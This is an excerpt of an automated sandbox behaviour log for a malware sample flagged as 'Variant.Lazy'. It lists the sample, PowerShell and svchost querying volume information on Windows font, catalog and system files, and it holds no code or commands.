                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
